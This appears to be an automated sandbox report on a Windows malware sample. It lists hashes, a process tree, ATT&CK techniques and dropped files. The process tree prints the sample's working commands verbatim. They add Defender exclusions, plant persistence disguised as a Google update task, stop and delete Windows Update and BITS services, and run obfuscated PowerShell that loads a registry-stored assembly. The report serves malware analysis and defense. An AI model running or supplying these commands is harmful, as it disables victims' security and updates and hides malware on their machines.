Analysis

  • max time kernel
    14s
  • max time network
    79s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-07-2023 19:40

General

  • Target

    dmi1dfg7n.exe

  • Size

    2.8MB

  • MD5

    9253ed091d81e076a3037e12af3dc871

  • SHA1

    ec02829a25b3bf57ad061bbe54180d0c99c76981

  • SHA256

    78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

  • SHA512

    29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

  • SSDEEP

    49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6

Score
8/10

Malware Config

Signatures

  • Stops running service(s) 3 TTPs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe
    "C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4324
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4032
      • C:\Windows\system32\powercfg.exe
        powercfg /x -hibernate-timeout-ac 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:388
      • C:\Windows\system32\powercfg.exe
        powercfg /x -hibernate-timeout-dc 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4592
      • C:\Windows\system32\powercfg.exe
        powercfg /x -standby-timeout-ac 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4456
      • C:\Windows\system32\powercfg.exe
        powercfg /x -standby-timeout-dc 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4812
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2756
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1776
      • C:\Windows\system32\sc.exe
        sc stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:984
      • C:\Windows\system32\sc.exe
        sc stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:4732
      • C:\Windows\system32\sc.exe
        sc stop wuauserv
        3⤵
        • Launches sc.exe
        PID:4688
      • C:\Windows\system32\sc.exe
        sc stop bits
        3⤵
        • Launches sc.exe
        PID:496
      • C:\Windows\system32\sc.exe
        sc stop dosvc
        3⤵
        • Launches sc.exe
        PID:2984
      • C:\Windows\system32\reg.exe
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        3⤵
          PID:2112
        • C:\Windows\system32\reg.exe
          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
          3⤵
            PID:4640
          • C:\Windows\system32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
            3⤵
              PID:1848
            • C:\Windows\system32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
              3⤵
                PID:1656
              • C:\Windows\system32\reg.exe
                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                3⤵
                  PID:720
              • C:\Windows\system32\dialer.exe
                C:\Windows\system32\dialer.exe
                2⤵
                  PID:420
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                  2⤵
                    PID:4584
                    • C:\Windows\system32\schtasks.exe
                      "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                      3⤵
                        PID:3132
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                    1⤵
                      PID:3820
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                      1⤵
                        PID:3236
                      • C:\Program Files\Google\Chrome\updater.exe
                        "C:\Program Files\Google\Chrome\updater.exe"
                        1⤵
                          PID:3940
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                            2⤵
                              PID:1836
                          • C:\Windows\System32\dllhost.exe
                            C:\Windows\System32\dllhost.exe /Processid:{aaaf2457-357b-431e-b7c4-05b11a9259ba}
                            1⤵
                              PID:2000
                            • C:\Windows\system32\WerFault.exe
                              C:\Windows\system32\WerFault.exe -pss -s 448 -p 620 -ip 620
                              1⤵
                                PID:4024
                              • C:\Windows\system32\WerFault.exe
                                C:\Windows\system32\WerFault.exe -pss -s 468 -p 688 -ip 688
                                1⤵
                                  PID:4652
                                • C:\Windows\system32\WerFault.exe
                                  C:\Windows\system32\WerFault.exe -u -p 688 -s 2840
                                  1⤵
                                  • Program crash
                                  PID:4812
                                • C:\Windows\system32\WerFault.exe
                                  C:\Windows\system32\WerFault.exe -u -p 620 -s 1132
                                  1⤵
                                  • Program crash
                                  PID:1012
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  1⤵
                                    PID:3408
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    1⤵
                                      PID:4352

                                    Network

                                    MITRE ATT&CK Matrix ATT&CK v13

                                    Persistence

                                    Create or Modify System Process

                                    1
                                    T1543

                                    Windows Service

                                    1
                                    T1543.003

                                    Privilege Escalation

                                    Create or Modify System Process

                                    1
                                    T1543

                                    Windows Service

                                    1
                                    T1543.003

                                    Defense Evasion

                                    Impair Defenses

                                    1
                                    T1562

                                    Impact

                                    Service Stop

                                    1
                                    T1489

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Program Files\Google\Chrome\updater.exe
                                      Filesize

                                      2.8MB

                                      MD5

                                      eb27bb8cfa99d659e4fe023e9002ecd1

                                      SHA1

                                      c783400302fdfae0518269c5a5a8d4bad29f42a3

                                      SHA256

                                      9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                                      SHA512

                                      ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                      Filesize

                                      2KB

                                      MD5

                                      d85ba6ff808d9e5444a4b369f5bc2730

                                      SHA1

                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                      SHA256

                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                      SHA512

                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      Filesize

                                      944B

                                      MD5

                                      77d622bb1a5b250869a3238b9bc1402b

                                      SHA1

                                      d47f4003c2554b9dfc4c16f22460b331886b191b

                                      SHA256

                                      f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                      SHA512

                                      d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      Filesize

                                      1KB

                                      MD5

                                      b835cbc4790dd6cbd6f1eff3ae08ff6a

                                      SHA1

                                      309d73e6d88c5bd8dc2149d751c3693f0083d9ec

                                      SHA256

                                      facaf6bcf67177e23c6da4d2be7a85f6b75c89af5f5eaaf9745a7e8ef87795bb

                                      SHA512

                                      d918b26707ff0fdd04cf12d3321d4a42d79f1dad2d2d78f57f3d01ada979c51b9a7930597e68e8e0086ca7ed0cd8d4f764c53e9f2cbbdd90567fea9463bed417

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfspndvw.g01.ps1
                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    • memory/384-253-0x000002099EC70000-0x000002099EC9A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/384-265-0x000002099EC70000-0x000002099EC9A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/384-256-0x00007FFADDED0000-0x00007FFADDEE0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/420-192-0x00007FF696AB0000-0x00007FF696B06000-memory.dmp
                                      Filesize

                                      344KB

                                    • memory/452-262-0x00007FFADDED0000-0x00007FFADDEE0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/452-260-0x000001EACD9A0000-0x000001EACD9CA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/452-268-0x000001EACD9A0000-0x000001EACD9CA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/620-241-0x000001684D320000-0x000001684D343000-memory.dmp
                                      Filesize

                                      140KB

                                    • memory/620-249-0x00007FFB1DEED000-0x00007FFB1DEEE000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/620-243-0x000001684D350000-0x000001684D37A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/620-269-0x000001684D350000-0x000001684D37A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/672-280-0x00000184555D0000-0x00000184555FA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/672-273-0x00000184555D0000-0x00000184555FA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/672-276-0x00007FFADDED0000-0x00007FFADDEE0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/688-246-0x000001D1DFFC0000-0x000001D1DFFEA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/688-248-0x00007FFADDED0000-0x00007FFADDEE0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/688-261-0x00007FFB1DEED000-0x00007FFB1DEEE000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/688-254-0x000001D1DFFC0000-0x000001D1DFFEA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/964-263-0x0000015B82D00000-0x0000015B82D2A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/964-250-0x0000015B82D00000-0x0000015B82D2A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/964-255-0x00007FFADDED0000-0x00007FFADDEE0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/964-266-0x00007FFB1DEEC000-0x00007FFB1DEED000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/1028-272-0x0000028142660000-0x000002814268A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1028-275-0x00007FFADDED0000-0x00007FFADDEE0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/1028-277-0x0000028142660000-0x000002814268A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1028-301-0x0000028142660000-0x000002814268A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1040-284-0x00007FFADDED0000-0x00007FFADDEE0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/1040-283-0x000001A426520000-0x000001A42654A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1040-321-0x000001A426520000-0x000001A42654A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1048-289-0x0000013D406A0000-0x0000013D406CA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1048-291-0x00007FFADDED0000-0x00007FFADDEE0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/1068-295-0x00007FFADDED0000-0x00007FFADDEE0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/1068-293-0x000001CF54F70000-0x000001CF54F9A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1068-296-0x000001CF54F70000-0x000001CF54F9A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1200-298-0x0000023F85250000-0x0000023F8527A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1200-300-0x00007FFADDED0000-0x00007FFADDEE0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/1316-313-0x000001EA16400000-0x000001EA1642A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1352-317-0x0000018861120000-0x000001886114A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1404-334-0x0000021E52890000-0x0000021E528BA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1416-326-0x00000224F7930000-0x00000224F795A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1508-339-0x0000029317DD0000-0x0000029317DFA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1564-345-0x000002631B390000-0x000002631B3BA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1572-350-0x0000023BC6160000-0x0000023BC618A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/2000-230-0x0000000140000000-0x0000000140042000-memory.dmp
                                      Filesize

                                      264KB

                                    • memory/2000-234-0x00007FFB1DE50000-0x00007FFB1E045000-memory.dmp
                                      Filesize

                                      2.0MB

                                    • memory/2000-235-0x0000000140000000-0x0000000140042000-memory.dmp
                                      Filesize

                                      264KB

                                    • memory/2000-229-0x0000000140000000-0x0000000140042000-memory.dmp
                                      Filesize

                                      264KB

                                    • memory/2000-238-0x0000000140000000-0x0000000140042000-memory.dmp
                                      Filesize

                                      264KB

                                    • memory/2000-236-0x00007FFB1C3F0000-0x00007FFB1C4AE000-memory.dmp
                                      Filesize

                                      760KB

                                    • memory/2000-231-0x0000000140000000-0x0000000140042000-memory.dmp
                                      Filesize

                                      264KB

                                    • memory/2016-169-0x00007FF785040000-0x00007FF785308000-memory.dmp
                                      Filesize

                                      2.8MB

                                    • memory/2016-133-0x00007FF785040000-0x00007FF785308000-memory.dmp
                                      Filesize

                                      2.8MB

                                    • memory/2756-152-0x00007FFAFF380000-0x00007FFAFFE41000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/2756-153-0x000001D0B7B60000-0x000001D0B7B70000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/2756-164-0x000001D0B7B60000-0x000001D0B7B70000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/2756-166-0x00007FFAFF380000-0x00007FFAFFE41000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/3236-197-0x00007FFAFF380000-0x00007FFAFFE41000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/3236-228-0x00007FFB1C3F0000-0x00007FFB1C4AE000-memory.dmp
                                      Filesize

                                      760KB

                                    • memory/3236-227-0x00007FFB1DE50000-0x00007FFB1E045000-memory.dmp
                                      Filesize

                                      2.0MB

                                    • memory/3236-211-0x000001C977890000-0x000001C9778A0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/3236-201-0x000001C977890000-0x000001C9778A0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/3236-237-0x00007FFAFF380000-0x00007FFAFFE41000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/3236-200-0x000001C977890000-0x000001C9778A0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/3408-354-0x000002502F380000-0x000002502F3AA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/3408-356-0x00007FFB1DE50000-0x00007FFB1E045000-memory.dmp
                                      Filesize

                                      2.0MB

                                    • memory/3820-244-0x00000000745F0000-0x0000000074DA0000-memory.dmp
                                      Filesize

                                      7.7MB

                                    • memory/3820-274-0x00000000013E0000-0x00000000013F0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/3820-357-0x0000000006C00000-0x00000000071A4000-memory.dmp
                                      Filesize

                                      5.6MB

                                    • memory/3820-194-0x00000000745F0000-0x0000000074DA0000-memory.dmp
                                      Filesize

                                      7.7MB

                                    • memory/3820-267-0x00000000013E0000-0x00000000013F0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/3820-195-0x00000000013E0000-0x00000000013F0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/3820-196-0x0000000001310000-0x0000000001346000-memory.dmp
                                      Filesize

                                      216KB

                                    • memory/3820-198-0x0000000004080000-0x00000000046A8000-memory.dmp
                                      Filesize

                                      6.2MB

                                    • memory/3820-362-0x0000000077011000-0x0000000077131000-memory.dmp
                                      Filesize

                                      1.1MB

                                    • memory/3820-214-0x0000000003C70000-0x0000000003C92000-memory.dmp
                                      Filesize

                                      136KB

                                    • memory/3820-340-0x0000000005C20000-0x0000000005C42000-memory.dmp
                                      Filesize

                                      136KB

                                    • memory/3820-303-0x0000000006580000-0x0000000006BFA000-memory.dmp
                                      Filesize

                                      6.5MB

                                    • memory/3820-292-0x00000000013E0000-0x00000000013F0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/3820-304-0x0000000005100000-0x000000000511A000-memory.dmp
                                      Filesize

                                      104KB

                                    • memory/3820-215-0x0000000003D10000-0x0000000003D76000-memory.dmp
                                      Filesize

                                      408KB

                                    • memory/3820-216-0x0000000003D80000-0x0000000003DE6000-memory.dmp
                                      Filesize

                                      408KB

                                    • memory/3820-329-0x0000000005F00000-0x0000000005F96000-memory.dmp
                                      Filesize

                                      600KB

                                    • memory/3820-226-0x0000000004C40000-0x0000000004C5E000-memory.dmp
                                      Filesize

                                      120KB

                                    • memory/3940-257-0x00007FF72C4A0000-0x00007FF72C768000-memory.dmp
                                      Filesize

                                      2.8MB

                                    • memory/3940-310-0x00007FF72C4A0000-0x00007FF72C768000-memory.dmp
                                      Filesize

                                      2.8MB

                                    • memory/4324-136-0x000001B912650000-0x000001B912672000-memory.dmp
                                      Filesize

                                      136KB

                                    • memory/4324-144-0x00007FFAFF380000-0x00007FFAFFE41000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/4324-146-0x000001B912680000-0x000001B912690000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4324-145-0x000001B912680000-0x000001B912690000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4324-147-0x000001B912680000-0x000001B912690000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4324-150-0x00007FFAFF380000-0x00007FFAFFE41000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/4352-367-0x000001880BF90000-0x000001880BFBA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/4584-175-0x00007FFAFF380000-0x00007FFAFFE41000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/4584-177-0x000001CD23640000-0x000001CD23650000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4584-187-0x000001CD23640000-0x000001CD23650000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4584-212-0x00007FFAFF380000-0x00007FFAFFE41000-memory.dmp
                                      Filesize

                                      10.8MB